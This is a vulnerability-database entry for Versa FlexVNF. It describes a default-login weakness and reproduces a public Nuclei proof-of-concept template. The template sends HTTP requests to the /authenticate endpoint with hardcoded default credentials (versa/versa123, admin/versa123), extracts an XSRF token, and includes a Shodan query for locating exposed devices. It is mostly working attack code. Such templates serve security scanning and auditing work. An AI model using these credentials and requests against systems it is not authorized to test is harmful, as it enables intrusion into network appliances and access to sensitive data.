漏洞描述
Versa FlexVNF contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
versa-flexvnf-default-login: Versa FlexVNF - Default Login
PoC代码[已公开]
id: versa-flexvnf-default-login
info:
name: Versa FlexVNF - Default Login
author: c-sh0
severity: high
description: Versa FlexVNF contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://versa-networks.com/products/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:o:versa-networks:versa_operating_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: title:"Flex VNF Web-UI"
product: versa_operating_system
vendor: versa-networks
tags: default-login,versa,flexvnf,vuln
http:
- raw:
- |
GET /authenticate HTTP/1.1
Host: {{Hostname}}
- |
POST /authenticate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
CSRF-Token: {{xsrf_token}}
{"username":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- versa
- admin
password:
- versa123
- versa123
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{\"username\":\"{{username}}\",\"error\":false}"
- type: status
status:
- 200
extractors:
- type: regex
name: xsrf_token
group: 1
internal: true
part: header
regex:
- '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)'
# digest: 4b0a00483046022100ab753b9a456a58328a08c074727ec0f81b0cedef80deaf31821309416d075da7022100a2c9451e78034ec3164ca34c91b979f89bbfafb0f24e4e0bbc07c4ef92b2b433:922c64590222798bb761d5b6d8e72950